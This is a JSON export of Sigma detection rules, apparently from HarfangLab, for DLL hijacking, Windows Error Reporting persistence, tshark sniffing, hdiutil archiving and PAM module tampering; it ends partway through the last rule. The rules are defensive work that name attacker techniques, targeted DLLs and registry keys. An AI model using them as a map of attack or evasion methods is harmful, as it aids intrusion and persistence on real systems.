"content": "title: DLL Hijacking via tracert.exe\nid: c04bc942-714f-4a5c-ac7a-74f7e2982ad2\ndescription: |\n Detects potential Windows DLL Hijacking via tracert.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tracert.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c04bc942-714f-4a5c-ac7a-74f7e2982ad2",
"rule_name": "DLL Hijacking via tracert.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tracert.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c04f7e83-0aac-495c-8097-bbdc694cc38c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089622Z",
"creation_date": "2026-03-23T11:45:34.089624Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089629Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wer_debugger.html",
"https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_windows_error_reporting.yml",
"content": "title: Possible Windows Error Reporting Persistence Added\nid: c04f7e83-0aac-495c-8097-bbdc694cc38c\ndescription: |\n Detects the creation or edition of the Windows Error Reporting debugging registry key that allows debugger execution when an application hangs.\n This method is used as a mean to achieve persistence by replacing the debugger image by a malicious payload.\n It is recommended to investigate the process that set the registry key and the binary added as a debugger for suspicious activities.\nreferences:\n - https://persistence-info.github.io/Data/wer_debugger.html\n - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_windbg:\n Details|contains: 'windbg.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c04f7e83-0aac-495c-8097-bbdc694cc38c",
"rule_name": "Possible Windows Error Reporting Persistence Added",
"rule_description": "Detects the creation or edition of the Windows Error Reporting debugging registry key that allows debugger execution when an application hangs.\nThis method is used as a mean to achieve persistence by replacing the debugger image by a malicious payload.\nIt is recommended to investigate the process that set the registry key and the binary added as a debugger for suspicious activities.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c076106d-84e0-4b78-bf21-d14cf99dd7ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587443Z",
"creation_date": "2026-03-23T11:45:34.587446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587454Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_agentservice.yml",
"content": "title: DLL Hijacking via agentservice.exe\nid: c076106d-84e0-4b78-bf21-d14cf99dd7ed\ndescription: |\n Detects potential Windows DLL Hijacking via agentservice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'agentservice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ACTIVEDS.dll'\n - '\\adsldpc.dll'\n - '\\FLTLIB.DLL'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c076106d-84e0-4b78-bf21-d14cf99dd7ed",
"rule_name": "DLL Hijacking via agentservice.exe",
"rule_description": "Detects potential Windows DLL Hijacking via agentservice.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c07c9535-ed8d-4264-b08e-30fccffbe351",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624328Z",
"creation_date": "2026-03-23T11:45:34.624330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624334Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tshark.yml",
"content": "title: Network Sniffed via tshark (Linux)\nid: c07c9535-ed8d-4264-b08e-30fccffbe351\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to check the parent processes for any other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump\n - https://attack.mitre.org/techniques/T1040/\ndate: 2022/12/26\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Tshark\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n filter_read_file:\n CommandLine|contains: ' -r '\n\n exclusion_container:\n - ParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c07c9535-ed8d-4264-b08e-30fccffbe351",
"rule_name": "Network Sniffed via tshark (Linux)",
"rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to check the parent processes for any other suspicious actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-11-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c086a838-90d0-40da-9f27-b89501f88044",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590480Z",
"creation_date": "2026-03-23T11:45:34.590486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mscoree.yml",
"content": "title: Unsigned Mscoree.dll Loaded\nid: c086a838-90d0-40da-9f27-b89501f88044\ndescription: |\n Detects a suspicious unsigned DLL named 'mscoree.dll' loaded by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/02/13\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\mscoree.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\mscoree.dll'\n - '?:\\Windows\\SysWOW64\\mscoree.dll'\n\n exclusion_known_sha:\n sha256: '0faaa9992142cb2933fa4112bcd62ba58fc0d8a6ac61bd3f05963bc6e8871c8b' # 10.0.22621.1 (WinBuild.160101.0800)\n\n exclusion_beyond_compare:\n Image|endswith: '\\Beyond Compare ?\\BCompare.exe'\n ImageLoaded|endswith: '\\Beyond Compare ?\\mscoree.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c086a838-90d0-40da-9f27-b89501f88044",
"rule_name": "Unsigned Mscoree.dll Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'mscoree.dll' loaded by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0d08a4d-f9d0-4017-b346-46c45ddb527a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618416Z",
"creation_date": "2026-03-23T11:45:34.618418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_dmg_archive_creation_file.yml",
"content": "title: Archive Created via hdiutil in a Suspicious Folder\nid: c0d08a4d-f9d0-4017-b346-46c45ddb527a\ndescription: |\n Detects the creation of an archive file using the hdiutil utility in a folder commonly used by malicious actors.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to hdiutil's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/hdiutil'\n ProcessCommandLine|contains: 'create'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0d08a4d-f9d0-4017-b346-46c45ddb527a",
"rule_name": "Archive Created via hdiutil in a Suspicious Folder",
"rule_description": "Detects the creation of an archive file using the hdiutil utility in a folder commonly used by malicious actors.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to hdiutil's execution and the content of the archive.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0f2754a-239d-4e6e-acf2-04f65ab80452",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.665327Z",
"creation_date": "2026-03-23T11:45:35.297579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297583Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md",
"https://github.com/zephrax/linux-pam-backdoor",
"https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9",
"https://attack.mitre.org/techniques/T1556/003/"
],
"name": "t1556_003_pam_modules_modified_linux.yml",
"content": "title: PAM Modules Modified\nid: c0f2754a-239d-4e6e-acf2-04f65ab80452\ndescription: |\n Detects an attempt to modify a pluggable authentication module (PAM).\n PAM is a suite of libraries that allows a Linux system administrator to configure methods to authenticate users.\n Adversaries may modify pluggable authentication modules to access user credentials or to add a backdoor and achieve persistence.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md\n - https://github.com/zephrax/linux-pam-backdoor\n - https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9\n - https://attack.mitre.org/techniques/T1556/003/\ndate: 2023/01/06\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.persistence\n - attack.t1556.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path|startswith: '/etc/pam.d/'\n - TargetPath|startswith: '/etc/pam.d/'\n is_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_swap_file:\n - Path:\n - '/etc/pam.d/.*.swp'\n - '/etc/pam.d/.*.swpx'\n - TargetPath:\n - '/etc/pam.d/.*.swp'\n - '/etc/pam.d/.*.swpx'\n\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|startswith: '/usr/bin/perl|/usr/bin/dash|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf update'\n - 'dnf install '\n - '/usr/bin/python?.? /usr/bin/dnf-3 '\n - '/usr/bin/dnf5 --installroot '\n exclusion_zypper:\n ProcessAncestors|startswith:\n - '/usr/bin/zypper|'\n - '/usr/bin/bash|/usr/bin/rpm|/usr/bin/zypper|'\n exclusion_pamac:\n ProcessImage: '/usr/bin/pamac-daemon'\n\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_pam_auth_update:\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --package\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --package --remove capability\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --root --package\n - ProcessCommandLine|startswith: '/usr/bin/perl -w /usr/sbin/pam-auth-update'\n - ProcessParentCommandLine|startswith: '/usr/bin/perl -w /usr/sbin/pam-auth-update'\n\n exclusion_dpkg_postinst:\n ProcessParentCommandLine: '/bin/sh -e /var/lib/dpkg/info/libpam-runtime.postinst configure'\n\n exclusion_authconfig:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python /sbin/authconfig --updateall '\n - '/usr/bin/python /usr/sbin/authconfig --update '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/sh -c /usr/sbin/authconfig --update '\n - '/usr/bin/python /sbin/authconfig --updateall '\n - '/usr/bin/python /usr/sbin/authconfig --update '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - 